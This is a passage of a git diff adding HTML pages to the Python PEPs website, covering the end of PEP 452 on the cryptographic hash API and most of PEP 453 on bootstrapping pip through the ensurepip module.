This attribute is identical to the module-level digest_size +variable, measuring the size of the digest produced by the +hashing object, measured in bytes. If the hash has a variable +output size, this output size must be chosen when the hashing +object is created, and this attribute must contain the +selected size. Therefore, None is not a legal value for this +attribute.
+
block_size
An integer value or NotImplemented; the internal block size +of the hash algorithm in bytes. The block size is used by the +HMAC module to pad the secret key to digest_size or to hash the +secret key if it is longer than digest_size. If no HMAC +algorithm is standardized for the hash algorithm, return +NotImplemented instead.
+
name
A text string value; the canonical, lowercase name of the hashing +algorithm. The name should be a suitable parameter for +hashlib.new.
+
+

Hashing objects require the following methods:

+
+
copy()
Return a separate copy of this hashing object. An update to +this copy won’t affect the original object.
+
digest()
Return the hash value of this hashing object as a bytes +containing 8-bit data. The object is not altered in any way +by this function; you can continue updating the object after +calling this function.
+
hexdigest()
Return the hash value of this hashing object as a string +containing hexadecimal digits. Lowercase letters should be used +for the digits ‘a’ through ‘f’. Like the .digest() method, this +method mustn’t alter the object.
+
update(string)
Hash bytes-like ‘string’ into the current state of the hashing +object. update() can be called any number of times during a +hashing object’s lifetime.
+
+

Hashing modules can define additional module-level functions or +object methods and still be compliant with this specification.

+

Here’s an example, using a module named ‘MD5’:

+
>>> import hashlib
+>>> from Crypto.Hash import MD5
+>>> m = MD5.new()
+>>> isinstance(m, hashlib.CryptoHash)
+True
+>>> m.name
+'md5'
+>>> m.digest_size
+16
+>>> m.block_size
+64
+>>> m.update(b'abc')
+>>> m.digest()
+b'\x90\x01P\x98<\xd2O\xb0\xd6\x96?}(\xe1\x7fr'
+>>> m.hexdigest()
+'900150983cd24fb0d6963f7d28e17f72'
+>>> MD5.new(b'abc').digest()
+b'\x90\x01P\x98<\xd2O\xb0\xd6\x96?}(\xe1\x7fr'
+
+
+
+
+

Rationale

+

The digest size is measured in bytes, not bits, even though hash +algorithm sizes are usually quoted in bits; MD5 is a 128-bit +algorithm and not a 16-byte one, for example. This is because, in +the sample code I looked at, the length in bytes is often needed +(to seek ahead or behind in a file; to compute the length of an +output string) while the length in bits is rarely used. +Therefore, the burden will fall on the few people actually needing +the size in bits, who will have to multiply digest_size by 8.

+

It’s been suggested that the update() method would be better named +append(). However, that method is really causing the current +state of the hashing object to be updated, and update() is already +used by the md5 and sha modules included with Python, so it seems +simplest to leave the name update() alone.

+

The order of the constructor’s arguments for keyed hashes was a +sticky issue. It wasn’t clear whether the key should come first +or second. It’s a required parameter, and the usual convention is +to place required parameters first, but that also means that the +‘string’ parameter moves from the first position to the second. +It would be possible to get confused and pass a single argument to +a keyed hash, thinking that you’re passing an initial string to an +unkeyed hash, but it doesn’t seem worth making the interface +for keyed hashes more obscure to avoid this potential error.

+
+
+

Changes from Version 1.0 to Version 2.0

+

Version 2.0 of API for Cryptographic Hash Functions clarifies some +aspects of the API and brings it up-to-date. It also formalized aspects +that were already de facto standards and provided by most +implementations.

+

Version 2.0 introduces the following new attributes:

+
+
name
The name property was made mandatory by issue 18532.
+
block_size
The new version also specifies that the return value +NotImplemented prevents HMAC support.
+
+

Version 2.0 takes the separation of binary and text data in Python +3.0 into account. The ‘string’ argument to new() and update() as +well as the ‘key’ argument must be bytes-like objects. On Python +2.x a hashing object may also support ASCII-only unicode. The actual +name of argument is not changed as it is part of the public API. +Code may depend on the fact that the argument is called ‘string’.

+
+ +
+

Changes

+
    +
  • 2001-09-17: Renamed clear() to reset(); added digest_size attribute +to objects; added .hexdigest() method.
  • +
  • 2001-09-20: Removed reset() method completely.
  • +
  • 2001-09-28: Set digest_size to None for variable-size hashes.
  • +
  • 2013-08-15: Added block_size and name attributes; clarified that +‘string’ actually refers to bytes-like objects.
  • +
+
+
+

Acknowledgements

+

Thanks to Aahz, Andrew Archibald, Rich Salz, Itamar +Shtull-Trauring, and the readers of the python-crypto list for +their comments on this PEP.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0452.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0453/index.html b/pep-0453/index.html new file mode 100644 index 00000000000..c7446a6d955 --- /dev/null +++ b/pep-0453/index.html @@ -0,0 +1,1135 @@ + + + + + + + + PEP 453 – Explicit bootstrapping of pip in Python installations | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 453 – Explicit bootstrapping of pip in Python installations

+
+
Author:
+
Donald Stufft <donald at stufft.io>, +Alyssa Coghlan <ncoghlan at gmail.com>
+
BDFL-Delegate:
+
Martin von Löwis
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
10-Aug-2013
+
Post-History:
+
30-Aug-2013, 15-Sep-2013, 18-Sep-2013, 19-Sep-2013, +23-Sep-2013, 29-Sep-2013, 13-Oct-2013, 20-Oct-2013
+
Resolution:
+
Python-Dev message
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes that the +Installing Python Modules guide in +Python 2.7, 3.3 and 3.4 be updated to officially recommend the use of pip +as the default installer for Python packages, and that appropriate technical +changes be made in Python 3.4 to provide pip by default in support of +that recommendation.

+
+
+

PEP Acceptance

+

This PEP was accepted for inclusion in Python 3.4 by Martin von Löwis on +Tuesday 22nd October, 2013.

+

Issue 19347 has been created to +track the implementation of this PEP.

+
+
+

Rationale

+

There are two related, but distinct rationales for the proposal in this +PEP. The first relates to the experience of new users, while the second +relates to better enabling the evolution of the broader Python packaging +ecosystem.

+
+

Improving the new user experience

+

Currently, on systems without a platform package manager and repository, +installing a third-party Python package into a freshly installed Python +requires first identifying an appropriate package manager and then +installing it.

+

Even on systems that do have a platform package manager, it is unlikely to +include every package that is available on the Python Package Index, and +even when a desired third-party package is available, the correct name in +the platform package manager may not be clear.

+

This means that, to work effectively with the Python Package Index +ecosystem, users must know which package manager to install, where to get +it, and how to install it. The effect of this is that third-party Python +projects are currently required to choose from a variety of undesirable +alternatives:

+
    +
  • Assume the user already has a suitable cross-platform package manager +installed.
  • +
  • Duplicate the instructions and tell their users how to install the +package manager.
  • +
  • Completely forgo the use of dependencies to ease installation concerns +for their users.
  • +
+

All of these available options have significant drawbacks.

+

If a project simply assumes a user already has the tooling then beginning +users may get a confusing error message when the installation command +doesn’t work. Some operating systems may ease this pain by providing a +global hook that looks for commands that don’t exist and suggest an OS +package they can install to make the command work, but that only works +on systems with platform package managers that include a package that +provides the relevant cross-platform installer command (such as many major +Linux distributions). No such assistance is available for Windows and +Mac OS X users, or more conservative Linux distributions. The challenges +of dealing with this problem for beginners (who are often also completely +new to programming, the use of command line tools and editing system +environment variables) are a regular feature of feedback the core Python +developers receive from professional educators and others introducing new +users to Python.

+

If a project chooses to duplicate the installation instructions and tell +their users how to install the package manager before telling them how to +install their own project then whenever these instructions need updates +they need updating by every project that has duplicated them. This is +particular problematic when there are multiple competing installation +tools available, and different projects recommend different tools.

+

This specific problem can be partially alleviated by strongly promoting +pip as the default installer and recommending that other projects +reference pip’s own bootstrapping instructions rather than +duplicating them. However the user experience created by this approach +still isn’t particularly good (although there is an effort under way to +create a combined Windows installer for pip and its dependencies that +should improve matters on that platform, and Mac OS X and *nix platforms +generally have wget and hence the ability to easily download and run the +bootstrap scripts from the command line).

+

The projects that have decided to forgo dependencies altogether are forced +to either duplicate the efforts of other projects by inventing their own +solutions to problems or are required to simply include the other projects +in their own source trees. Both of these options present their own problems +either in duplicating maintenance work across the ecosystem or potentially +leaving users vulnerable to security issues because the included code or +duplicated efforts are not automatically updated when upstream releases a new +version.

+

By officially recommending and providing by default a specific cross-platform +package manager it will be easier for users trying to install these +third-party packages as well as easier for the people distributing them as +they should now be able to safely assume that most users will have the +appropriate installation tools available (or access to clear instructions on +how to obtain them). This is expected to become more important in the future +as the Wheel package format (deliberately) does not have a built in +“installer” in the form of setup.py so users wishing to install +from a wheel file will want an installer even in the simplest cases.

+

Reducing the burden of actually installing a third-party package should +also decrease the pressure to add every useful module to the standard +library. This will allow additions to the standard library to focus more +on why Python should have a particular tool out of the box, and why it +is reasonable for that package to adopt the standard library’s 18-24 month +feature release cycle, instead of using the general difficulty of installing +third-party packages as justification for inclusion.

+

Providing a standard installation system also helps with bootstrapping +alternate build and installer systems, such as zc.buildout, hashdist +and conda. So long as pip install <tool> works, then a standard +Python-specific installer provides a reasonably secure, cross platform +mechanism to get access to these utilities.

+
+
+

Enabling the evolution of the broader Python packaging ecosystem

+

As no new packaging standard can achieve widespread adoption without a +transition strategy that covers the versions of Python that are in +widespread current use (rather than merely future versions, like most +language features), the change proposed in this PEP is considered a +necessary step in the evolution of the Python packaging ecosystem

+

The broader community has embraced the Python Package Index as a mechanism +for distributing and installing Python software, but the different concerns +of language evolution and secure software distribution mean that a faster +feature release cycle that encompasses older versions is needed to properly +support the latter.

+

In addition, the core CPython development team have the luxury of +dropping support for earlier Python versions well before the rest of the +community, as downstream commercial redistributors pick up the task of +providing support for those versions to users that still need it, while +many third party libraries maintain compatibility with those versions as +long as they remain in widespread use.

+

This means that the current setup.py install based model for package +installation poses serious difficulties for the development and adoption +of new packaging standards, as, depending on how a project writes their +setup.py file, the installation command (along with other operations) +may end up invoking the standard library’s distutils package.

+

As an indicator of how this may cause problems for the broader ecosystem, +consider that the feature set of distutils in Python 2.6 was frozen +in June 2008 (with the release of Python 2.6b1), while the feature set of +distutils in Python 2.7 was frozen in April 2010 (with the release of +Python 2.7b1).

+

By contrast, using a separate installer application like pip (which +ensures that even setup.py files that invoke distutils directly +still support the new packaging standards) makes it possible to support +new packaging standards in older versions of Python, just by upgrading +pip (which receives new feature releases roughly every 6 months). The +situation on older versions of Python is further improved by making it +easier for end users to install and upgrade newer build systems like +setuptools or improved PyPI upload utilities like twine.

+

It is not coincidental that this proposed model of using a separate installer +program with more metadata heavy and less active distribution formats matches +that used by most operating systems (including Windows since the introduction +of the installer service and the MSI file format), as well as many other +language specific installers.

+

For Python 2.6, this compatibility issue is largely limited to various +enterprise Linux distributions (and their downstream derivatives). These +distributions often have even slower update cycles than CPython, so they +offer full support for versions of Python that are considered “security +fix only” versions upstream (and sometimes may even be to the point where +the core development team no longer support them at all - you can still get +commercial support for Python 2.3 if you really need it!).

+

In practice, the fact that tools like wget and curl are readily +available on Linux systems, that most users of Python on Linux are +already familiar with the command line, and that most Linux distributions +ship with a default configuration that makes running Python scripts easy, +means that the existing pip bootstrapping instructions for any *nix +system are already quite straightforward. Even if pip isn’t provided by +the system package manager, then using wget or curl to retrieve the +bootstrap script from www.pip-installer.org and then running it is just a +couple of shell commands that can easily be copied and pasted as necessary.

+

Accordingly, for any version of Python on any *nix system, the need to +bootstrap pip in older versions isn’t considered a major barrier to +adoption of new packaging standards, since it’s just one more small +speedbump encountered by users of these long term stable releases. For +*nix systems, this PEP’s formal endorsement of pip as the preferred +default packaging tool is seen as more important than the underlying +technical details involved in making pip available by default, since +it shifts the nature of the conversation between the developers of pip +and downstream repackagers of both pip and CPython.

+

For Python 2.7, on the other hand, the compatibility issue for adopting new +metadata standards is far more widespread, as it affects the python.org +binary installers for Windows and Mac OS X, as well as even relatively +fast moving *nix platforms.

+

Firstly, and unlike Python 2.6, Python 2.7 is still a fully supported +upstream version, and will remain so until the release of Python 2.7.9 +(currently scheduled for May 2015), at which time it is expected to enter +the usual “security fix only” mode. That means there are at least another +19 months where Python 2.7 is a deployment target for Python applications +that enjoys full upstream support. Even after the core development team +switches 2.7 to security release only mode in 2015, Python 2.7 will likely +remain a commercially supported legacy target out beyond 2020.

+

While Python 3 already presents a compelling alternative over Python 2 for +new Python applications and deployments without an existing investment +in Python 2 and without a dependency on specific Python 2 only third party +modules (a set which is getting ever smaller over time), it is going to take +longer to create compelling business cases to update existing Python 2.7 +based infrastructure to Python 3, especially in situations where the culture +of automated testing is weak (or nonexistent), making it difficult to +effectively use the available migration utilities.

+

While this PEP only proposes documentation changes for Python 2.7, once +pip has a Windows installer available, a separate PEP will be created +and submitted proposing the creation and distribution of aggregate installers +for future CPython 2.7 maintenance releases that combine the CPython, +pip and Python Launcher for Windows installers into a single download +(the separate downloads would still remain available - the aggregate +installers would be provided as a convenience, and as a clear indication +of the recommended operating environment for Python in Windows systems).

+
+
+

Why pip?

+

pip has been chosen as the preferred default installer, as it is an +already popular tool that addresses several design and user experience +issues with its predecessor easy_install (these issues can’t readily +be fixed in easy_install itself due to backwards compatibility +concerns). pip is also well suited to working within the bounds of +a single Python runtime installation (including associated virtual +environments), which is a desirable feature for a tool bundled with CPython.

+

Other tools like zc.buildout and conda are more ambitious in their +aims (and hence substantially better than pip at handling external +binary dependencies), so it makes sense for the Python ecosystem to treat +them more like platform package managers to interoperate with rather than +as the default cross-platform installation tool. This relationship is +similar to that between pip and platform package management systems +like apt and yum (which are also designed to handle arbitrary +binary dependencies).

+
+
+
+

Proposal Overview

+

This PEP proposes that the +Installing Python Modules guide be +updated to officially recommend the use of pip as the default +installer for Python packages, rather than the current approach of +recommending the direct invocation of the setup.py install command.

+

However, to avoid recommending a tool that CPython does not provide, it is +further proposed that the pip package manager be made available by +default when installing CPython 3.4 or later and when creating virtual +environments using the standard library’s venv module via the +pyvenv command line utility.

+

To support that end, this PEP proposes the inclusion of an ensurepip +bootstrapping module in Python 3.4, as well as automatic invocation of that +module from pyvenv and changes to the way Python installed scripts are +handled on Windows. Using a bootstrap module rather than providing pip +directly helps to clearly demarcate development responsibilities, and to +avoid inadvertently downgrading pip when updating CPython.

+

To provide clear guidance for new users of Python that may not be +starting with the latest release, this PEP also proposes that the +“Installing Python Modules” guides in Python 2.7 and 3.3 be updated to +recommend installing and using pip, rather than invoking distutils +directly. It does not propose backporting any of the code changes that +are being proposed for Python 3.4.

+

Finally, the PEP also strongly recommends that CPython redistributors and +other Python implementations ensure that pip is available by default, or +at the very least, explicitly document the fact that it is not included.

+

This PEP does not propose making pip (or any dependencies) directly +available as part of the standard library. Instead, pip will be a +bundled application provided along with CPython for the convenience +of Python users, but subject to its own development life cycle and able +to be upgraded independently of the core interpreter and standard library.

+
+
+

Explicit bootstrapping mechanism

+

An additional module called ensurepip will be added to the standard +library whose purpose is to install pip and any of its dependencies into the +appropriate location (most commonly site-packages). It will expose a +callable named bootstrap() as well as offer direct execution via +python -m ensurepip.

+

The bootstrap will not contact PyPI, but instead rely on a private copy +of pip stored inside the standard library. Accordingly, only options +related to the installation location will be supported (--user, +--root, etc).

+

It is considered desirable that users be strongly encouraged to use the +latest available version of pip, in order to take advantage of the +ongoing efforts to improve the security of the PyPI based ecosystem, as +well as benefiting from the efforts to improve the speed, reliability and +flexibility of that ecosystem.

+

In order to satisfy this goal of providing the most recent version of +pip by default, the private copy of pip will be updated in CPython +maintenance releases, which should align well with the 6-month cycle used +for new pip releases.

+
+

Security considerations

+

The design in this PEP has been deliberately chosen to avoid making any +significant changes to the trust model of CPython for end users that do +not subsequently run the command pip install --upgrade pip.

+

The installers will contain all the components of a fully functioning +version of Python, including the pip installer. The installation +process will not require network access, and will not rely on +trusting the security of the network connection established between +pip and the Python package index.

+

Only users that choose to use pip to communicate with PyPI will +need to pay attention to the additional security considerations that come +with doing so.

+

However, the core CPython team will still assist with reviewing and +resolving at least the certificate update management issue currently +affecting the requests project (and hence pip), and may also be +able to offer assistance in resolving other identified security concerns +[1].

+
+
+

Reliability considerations

+

By including the bootstrap as part of the standard library (rather than +solely as a feature of the binary installers), the correct operation of +the bootstrap command can be easily tested using the existing CPython +buildbot infrastructure rather than adding significantly to the testing +burden for the installers themselves.

+
+
+

Implementation strategy

+

To ensure there is no need for network access when installing Python or +creating virtual environments, the ensurepip module will, as an +implementation detail, include a complete private copy of pip and its +dependencies which will be used to extract pip and install it into the target +environment. It is important to stress that this private copy of pip is +only an implementation detail and it should not be relied on or +assumed to exist beyond the public capabilities exposed through the +ensurepip module (and indirectly through venv).

+

There is not yet a reference ensurepip implementation. The existing +get-pip.py bootstrap script demonstrates an earlier variation of the +general concept, but the standard library version would take advantage of +the improved distribution capabilities offered by the CPython installers +to include private copies of pip and setuptools as wheel files +(rather than as embedded base64 encoded data), and would not try to +contact PyPI (instead installing directly from the private wheel files).

+

Rather than including separate code to handle the bootstrapping, the +ensurepip module will manipulate sys.path appropriately to allow +the wheel files to be used to install themselves, either into the current +Python installation or into a virtual environment (as determined by the +options passed to the bootstrap command).

+

It is proposed that the implementation be carried out in five separate +steps (all steps after the first two are independent of each other and +can be carried out in any order):

+
    +
  • the first step would update the “Installing Python Modules” documentation +to recommend the use of pip and reference the pip team’s +instructions for downloading and installing it. This change would be +applied to Python 2.7, 3.3, and 3.4.
  • +
  • the ensurepip module and the private copies of the most recently +released versions of pip and setuptools would be added to Python 3.4 +and the 3.4 “Installing Python Modules” documentation updated accordingly.
  • +
  • the CPython Windows installer would be updated to offer the new pip +installation option for Python 3.4.
  • +
  • the CPython Mac OS X installer would be updated to offer the new pip +installation option for Python 3.4.
  • +
  • the venv module and pyvenv command would be updated to make use +of ensurepip in Python 3.4
  • +
  • the PATH handling on Windows would be updated for Python 3.4+
  • +
+
+
+

Integration timeline

+

If this PEP is accepted, the proposed time frame for integration of pip +into the CPython release is as follows:

+
    +
  • as soon as possible after the release of 3.4.0 alpha 4
      +
    • Documentation updated and ensurepip implemented based on a +pre-release version of pip 1.5.
    • +
    • All other proposed functional changes for Python 3.4 implemented, +including the installer updates to invoke ensurepip.
    • +
    +
  • +
  • by November 20th (3 days prior to the scheduled date of 3.4.0 beta 1)
      +
    • ensurepip updated to use a pip 1.5 release candidate.
    • +
    • PEP 101 updated to cover ensuring the bundled version of pip is up +to date.
    • +
    +
  • +
  • by November 24th (scheduled date of 3.4.0 beta 1)
      +
    • As with any other new feature, all proposed functional changes for +Python 3.4 must be implemented prior to the beta feature freeze.
    • +
    +
  • +
  • by December 29th (1 week prior to the scheduled date of 3.4.0 beta 2)
      +
    • requests certificate management issue resolved
    • +
    • ensurepip updated to the final release of pip 1.5, or a +subsequent maintenance release (including a suitably updated vendored +copy of requests)
    • +
    +
  • +
+

(See PEP 429 for the current official scheduled dates of each release. Dates +listed above are accurate as of October 20th, 2013.)

+

If there is no final or maintenance release of pip 1.5 with a suitable +updated version of requests available by one week before the scheduled +Python 3.4 beta 2 release, then implementation of this PEP will +be deferred to Python 3.5. Note that this scenario is considered unlikely - +the tentative date for the pip 1.5 release is currently December 1st.

+

In future CPython releases, this kind of coordinated scheduling shouldn’t be +needed: the CPython release manager will be able to just update to the latest +released version of pip. However, in this case, some fixes are needed in +pip in order to allow the bundling to work correctly, and the +certificate update mechanism for requests needs to be improved, so the +pip 1.5 release cycle needs to be properly aligned with the CPython 3.4 +beta releases.

+
+
+

Proposed CLI

+

The proposed CLI is based on a subset of the existing pip install +options:

+
Usage:
+  python -m ensurepip [options]
+
+General Options:
+  -h, --help          Show help.
+  -v, --verbose       Give more output. Option is additive, and can be used up to 3 times.
+  -V, --version       Show the pip version that would be extracted and exit.
+  -q, --quiet         Give less output.
+
+Installation Options:
+  -U, --upgrade       Upgrade pip and dependencies, even if already installed
+  --user              Install using the user scheme.
+  --root <dir>        Install everything relative to this alternate root directory.
+
+
+

In most cases, end users won’t need to use this CLI directly, as pip +should have been installed automatically when installing Python or when +creating a virtual environment. However, it is formally documented as a +public interface to support at least these known use cases:

+
    +
  • Windows and Mac OS X installations where the “Install pip” option was +not chosen during installation
  • +
  • any installation where the user previously ran “pip uninstall pip”
  • +
+

Users that want to retrieve the latest version from PyPI, or otherwise +need more flexibility, can then invoke the extracted pip appropriately.

+
+
+

Proposed module API

+

The proposed ensurepip module API consists of the following two +functions:

+
def version():
+    """
+    Returns a string specifying the bundled version of pip.
+    """
+
+def bootstrap(root=None, upgrade=False, user=False, verbosity=0):
+    """
+    Bootstrap pip into the current Python installation (or the given root
+    directory).
+    """
+
+
+
+
+

Invocation from the CPython installers

+

The CPython Windows and Mac OS X installers will each gain a new option:

+
    +
  • Install pip (the default Python package management utility)?
  • +
+

This option will be checked by default.

+

If the option is checked, then the installer will invoke the following +command with the just installed Python:

+
python -m ensurepip --upgrade
+
+
+

This ensures that, by default, installing or updating CPython will ensure +that the installed version of pip is at least as recent as the one included +with that version of CPython. If a newer version of pip has already been +installed then python -m ensurepip --upgrade will simply return without +doing anything.

+
+
+

Installing from source

+

Just as the prebuilt binary installers will be updated to run +python -m ensurepip by default, a similar change will be made to the +make install and make altinstall commands of the source +distribution. The directory settings in the sysconfig module should +ensure the pip components are automatically installed to the expected +locations.

+

ensurepip itself (including the private copy of pip and its +dependencies) will always be installed normally (as it is a regular +part of the standard library), but an option will be provided to skip +the invocation of ensurepip.

+

This means that even installing from source will provide pip by default, +but redistributors provide pip by other means (or not providing it at +all) will still be able to opt out of installing it using ensurepip.

+
+
+

Changes to virtual environments

+

Python 3.3 included a standard library approach to virtual Python environments +through the venv module. Since its release it has become clear that very +few users have been willing to use this feature directly, in part due to the +lack of an installer present by default inside of the virtual environment. +They have instead opted to continue using the virtualenv package which +does include pip installed by default.

+

To make the venv more useful to users it will be modified to issue the +pip bootstrap by default inside of the new environment while creating it. This +will allow people the same convenience inside of the virtual environment as +this PEP provides outside of it as well as bringing the venv module closer +to feature parity with the external virtualenv package, making it a more +suitable replacement.

+

To handle cases where a user does not wish to have pip bootstrapped into +their virtual environment a --without-pip option will be +added.

+

The venv.EnvBuilder and venv.create APIs will be updated to accept +one new parameter: with_pip (defaulting to False).

+

The new default for the module API is chosen for backwards compatibility +with the current behaviour (as it is assumed that most invocation of the +venv module happens through third part tools that likely will not +want pip installed without explicitly requesting it), while the +default for the command line interface is chosen to try to ensure pip +is available in most virtual environments without additional action on the +part of the end user.

+

As this change will only benefit Python 3.4 and later versions, the +third-party virtualenv project will still be needed to obtain a +consistent cross-version experience in Python 3.3 and 2.7.

+
+
+

Documentation

+

The “Installing Python Modules” section of the standard library +documentation in Python 2.7, 3.3 and 3.4 will be updated to recommend +the use of the pip installer, either provided by default in Python 3.4 +or retrieved and installed by the user in Python 2.7 or 3.3. It will give +a brief description of the most common commands and options, but delegate +to the externally maintained pip documentation for the full details.

+

In Python 3.4, the pyvenv and venv documentation will also be +updated to reference the revised module installation guide.

+

The existing content of the module installation guide will be retained in +all versions, but under a new “Invoking distutils directly” subsection.

+
+
+

Bundling CA certificates with CPython

+

The ensurepip implementation will include the pip CA bundle along +with the rest of pip. This means CPython effectively includes +a CA bundle that is used solely by pip after it has been extracted.

+

This is considered preferable to relying solely on the system +certificate stores, as it ensures that pip will behave the same +across all supported versions of Python, even those prior to Python 3.4 +that cannot access the system certificate store on Windows.

+
+
+

Automatic installation of setuptools

+

pip currently depends on setuptools to handle metadata generation +during the build process, along with some other features. While work is +ongoing to reduce or eliminate this dependency, it is not clear if that +work will be complete for pip 1.5 (which is the version likely to be current +when Python 3.4.0 is released).

+

This PEP proposes that, if pip still requires it as a dependency, +ensurepip will include a private copy of setuptools (in addition +to the private copy of ensurepip). python -m ensurepip will then +install the private copy in addition to installing pip itself.

+

However, this behavior is officially considered an implementation +detail. Other projects which explicitly require setuptools must still +provide an appropriate dependency declaration, rather than assuming +setuptools will always be installed alongside pip.

+

The private copy of setuptools will be removed from ensurepip +once it is no longer needed. This is likely to be at the point when +get-pip.py stops installing setuptools by default. +As long as setuptools is needed, it will be a completely unmodified copy of +the latest upstream setuptools release, including the easy_install +script if the upstream setuptools continues to include it. The installation +of easy_install along with pip isn’t considered desirable, but +installing a broken setuptools would be worse. This problem will +naturally resolve itself once the pip developers have managed to +eliminate their dependency on setuptools and the private copy of +setuptools can be removed entirely from CPython.

+
+
+

Updating the private copy of pip

+

In order to keep up with evolutions in packaging as well as providing users +with as recent version a possible the ensurepip module will be +regularly updated to the latest versions of everything it bootstraps.

+

After each new pip release, and again during the preparation for any +release of Python (including feature releases), a script, provided as part +of the implementation for this PEP, will be run to ensure the private +copies stored in the CPython source repository have been updated to the +latest versions.

+
+
+

Updating the ensurepip module API and CLI

+

Like venv and pyvenv, the ensurepip module API and CLI +will be governed by the normal rules for the standard library: no +new features are permitted in maintenance releases.

+

However, the embedded components may be updated as noted above, so +the extracted pip may offer additional functionality in maintenance +releases.

+
+
+
+

Uninstallation

+

No changes are proposed to the CPython uninstallation process by this PEP. +The bootstrapped pip will be installed the same way as any other pip +installed packages, and will be handled in the same way as any other +post-install additions to the Python environment.

+

At least on Windows, that means the bootstrapped files will be +left behind after uninstallation, since those files won’t be associated +with the Python MSI installer.

+

While the case can be made for the CPython installers clearing out these +directories automatically, changing that behaviour is considered outside +the scope of this PEP.

+
+
+

Script Execution on Windows

+

While the Windows installer was updated in Python 3.3 to optionally +make python available on the PATH, no such change was made to +include the script installation directory returned by +sysconfig.get_path("scripts").

+

Accordingly, in addition to adding the option to extract and install pip +during installation, this PEP proposes that the Windows installer in +Python 3.4 and later be updated to also add the path returned by +sysconfig.get_path("scripts") to the Windows PATH when the PATH +modification option is enabled during installation

+

Note that this change will only be available in Python 3.4 and later.

+

This means that, for Python 3.3, the most reliable way to invoke pip globally +on Windows (without tinkering manually with PATH) will still remain +py -m pip (or py -3 -m pip to select the Python 3 version if both +Python 2 and 3 are installed) rather than simply calling pip. This +works because Python 3.3 provides the Python Launcher for +Windows (and the associated py command) by default.

+

For Python 2.7 and 3.2, the most reliable mechanism will be to install the +Python Launcher for Windows using the standalone installer and then use +py -m pip as noted above.

+

Adding the scripts directory to the system PATH will mean that pip +works reliably in the “only one Python installation on the system PATH” +case, with py -m pip, pipX, or pipX.Y needed only to select a +non-default version in the parallel installation case (and outside a virtual +environment). This change should also make the pyvenv command substantially +easier to invoke on Windows, along with all scripts installed by pip, +easy_install and similar tools.

+

While the script invocations on recent versions of Python will run through +the Python launcher for Windows, this shouldn’t cause any issues, as long +as the Python files in the Scripts directory correctly specify a Python version +in their shebang line or have an adjacent Windows executable (as +easy_install and pip do).

+
+
+

Recommendations for Downstream Distributors

+

A common source of Python installations are through downstream distributors +such as the various Linux Distributions [3] [4] [5], OSX +package managers [6] [7] [8], and commercial Python +redistributors [9] [10] [11]. In order to +provide a consistent, user-friendly experience to all users of Python +regardless of how they obtained Python this PEP recommends and asks that +downstream distributors:

+
    +
  • Ensure that whenever Python is installed pip is either installed or is +otherwise made readily available to end users.
      +
    • For redistributors using binary installers, this may take the form of +optionally executing the ensurepip bootstrap during installation, +similar to the CPython installers.
    • +
    • For redistributors using package management systems, it may take the +form of separate packages with dependencies on each other so that +installing the Python package installs the pip package and installing +the pip package installs the Python package.
    • +
    • Another reasonable way to implement this is to package pip separately but +ensure that there is some sort of global hook that will recommend +installing the separate pip package when a user executes pip without +it being installed. Systems that choose this option should ensure that +the ensurepip module still installs pip directly when invoked inside +a virtual environment, but may modify the module in the system Python +installation to redirect to the platform provided mechanism when +installing pip globally.
    • +
    +
  • +
  • Even if pip is made available globally by other means, do not remove the +ensurepip module in Python 3.4 or later.
      +
    • ensurepip will be required for automatic installation of pip into +virtual environments by the venv module.
    • +
    • This is similar to the existing virtualenv package for which many +downstream distributors have already made exception to the common +“debundling” policy.
    • +
    • This does mean that if pip needs to be updated due to a security +issue, so does the private copy in the ensurepip bootstrap module
    • +
    • However, altering the private copy of pip to remove the embedded +CA certificate bundle and rely on the system CA bundle instead is a +reasonable change.
    • +
    +
  • +
  • Ensure that all features of this PEP continue to work with any modifications +made to the redistributed version of Python.
      +
    • Checking the version of pip that will be bootstrapped using +python -m ensurepip --version or ensurepip.version().
    • +
    • Installation of pip into a global or virtual python environment using +python -m ensurepip or ensurepip.bootstrap().
    • +
    • pip install --upgrade pip in a global installation should not affect +any already created virtual environments (but is permitted to affect +future virtual environments, even though it will not do so when using +the standard implementation of ensurepip).
    • +
    • pip install --upgrade pip in a virtual environment should not affect +the global installation.
    • +
    +
  • +
  • Migrate build systems to utilize pip and Wheel +wherever feasible +and avoid directly invoking setup.py.
      +
    • This will help ensure a smoother and more timely migration to improved +metadata formats as the Python packaging ecosystem continues to evolve.
    • +
    +
  • +
+

In the event that a Python redistributor chooses not to follow these +recommendations, we request that they explicitly document this fact and +provide their users with suitable guidance on translating upstream pip +based installation instructions into something appropriate for the platform.

+

Other Python implementations are also encouraged to follow these guidelines +where applicable.

+
+
+

Policies & Governance

+

The maintainers of the bootstrapped software and the CPython core team will +work together in order to address the needs of both. The bootstrapped +software will still remain external to CPython and this PEP does not +include CPython subsuming the development responsibilities or design +decisions of the bootstrapped software. This PEP aims to decrease the +burden on end users wanting to use third-party packages and the +decisions inside it are pragmatic ones that represent the trust that the +Python community has already placed in the Python Packaging Authority as +the authors and maintainers of pip, setuptools, PyPI, virtualenv +and other related projects.

+
+

Backwards Compatibility

+

The public API and CLI of the ensurepip module itself will fall under +the typical backwards compatibility policy of Python for its standard +library. The externally developed software that this PEP bundles does not.

+

Most importantly, this means that the bootstrapped version of pip may gain +new features in CPython maintenance releases, and pip continues to operate on +its own 6 month release cycle rather than CPython’s 18-24 month cycle.

+
+
+

Security Releases

+

Any security update that affects the ensurepip module will be shared +prior to release with the Python Security Response Team +(security@python.org). The PSRT will then decide if the reported issue +warrants a security release of CPython with an updated private copy of +pip.

+
+
+

Licensing

+

pip is currently licensed as 1 Clause BSD, and it contains code taken +from other projects. Additionally this PEP will include setuptools until +such time as pip no longer requires it. The licenses for these appear in +the table below.

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
ProjectLicense
requestsApache 2.0
six1 Clause BSD
html5lib1 Clause BSD
distlibPSF
colorama3 Clause BSD
Mozilla CA BundleLGPL
setuptoolsPSF
+

All of these licenses should be compatible with the PSF license. Additionally +it is unclear if a CA Bundle is copyrightable material and thus if it needs +or can be licensed at all.

+
+
+
+

Appendix: Rejected Proposals

+
+

Changing the name of the scripts directory on Windows

+

